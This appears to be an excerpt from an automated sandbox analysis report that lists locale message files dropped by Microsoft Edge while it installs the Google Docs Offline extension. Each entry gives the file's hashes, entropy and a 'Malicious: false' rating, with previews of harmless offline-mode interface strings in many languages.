SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
SSDEEP:	48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
MD5:	3B98C4ED8874A160C3789FEAD5553CFA
SHA1:	5550D0EC548335293D962AAA96B6443DD8ABB9F6
SHA-256:	ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
SHA-512:	5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ms\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	936
Entropy (8bit):	4.457879437756106
Encrypted:	false
SSDEEP:	24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
MD5:	7D273824B1E22426C033FF5D8D7162B7
SHA1:	EADBE9DBE5519BD60458B3551BDFC36A10049DD1
SHA-256:	2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
SHA-512:	E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\my\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3830
Entropy (8bit):	3.5483353063347587
Encrypted:	false
SSDEEP:	48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
MD5:	342335A22F1886B8BC92008597326B24
SHA1:	2CB04F892E430DCD7705C02BF0A8619354515513
SHA-256:	243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
SHA-512:	CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
Malicious:	false
Preview:	{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ne\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1898
Entropy (8bit):	4.187050294267571
Encrypted:	false
SSDEEP:	24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
MD5:	B1083DA5EC718D1F2F093BD3D1FB4F37
SHA1:	74B6F050D918448396642765DEF1AD5390AB5282
SHA-256:	E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
SHA-512:	7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.513485418448461
Encrypted:	false
SSDEEP:	12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
MD5:	32DF72F14BE59A9BC9777113A8B21DE6
SHA1:	2A8D9B9A998453144307DD0B700A76E783062AD0
SHA-256:	F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
SHA-512:	E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\nn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\no\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	878
Entropy (8bit):	4.4541485835627475
Encrypted:	false
SSDEEP:	24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
MD5:	A1744B0F53CCF889955B95108367F9C8
SHA1:	6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
SHA-256:	21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
SHA-512:	F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\pa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	3.839730779948262
Encrypted:	false
SSDEEP:	48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
MD5:	97F769F51B83D35C260D1F8CFD7990AF
SHA1:	0D59A76564B0AEE31D0A074305905472F740CECA
SHA-256:	BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
SHA-512:	D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
Malicious:	false
Preview:	{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	978
Entropy (8bit):	4.879137540019932
Encrypted:	false
SSDEEP:	24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
MD5:	B8D55E4E3B9619784AECA61BA15C9C0F
SHA1:	B4A9C9885FBEB78635957296FDDD12579FEFA033
SHA-256:	E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
SHA-512:	266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
Malicious:	false
Preview:	{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	907
Entropy (8bit):	4.599411354657937
Encrypted:	false
SSDEEP:	12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
MD5:	608551F7026E6BA8C0CF85D9AC11F8E3
SHA1:	87B017B2D4DA17E322AF6384F82B57B807628617
SHA-256:	A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
SHA-512:	82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	914
Entropy (8bit):	4.604761241355716
Encrypted:	false
SSDEEP:	24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
MD5:	0963F2F3641A62A78B02825F6FA3941C
SHA1:	7E6972BEAB3D18E49857079A24FB9336BC4D2D48
SHA-256:	E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
SHA-512:	22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	937
Entropy (8bit):	4.686555713975264
Encrypted:	false
SSDEEP:	24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
MD5:	BED8332AB788098D276B448EC2B33351
SHA1:	6084124A2B32F386967DA980CBE79DD86742859E
SHA-256:	085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
SHA-512:	22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1337
Entropy (8bit):	4.69531415794894
Encrypted:	false
SSDEEP:	24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
MD5:	51D34FE303D0C90EE409A2397FCA437D
SHA1:	B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
SHA-256:	BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
SHA-512:	E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\si\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2846
Entropy (8bit):	3.7416822879702547
Encrypted:	false
SSDEEP:	48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
MD5:	B8A4FD612534A171A9A03C1984BB4BDD
SHA1:	F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
SHA-256:	54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
SHA-512:	C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
Malicious:	false
Preview:	{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	934
Entropy (8bit):	4.882122893545996
Encrypted:	false
SSDEEP:	24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
MD5:	8E55817BF7A87052F11FE554A61C52D5
SHA1:	9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
SHA-256:	903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
SHA-512:	EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6204_1855896480\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	963
Entropy (8bit):	4.6041913416245
Encrypted:	false
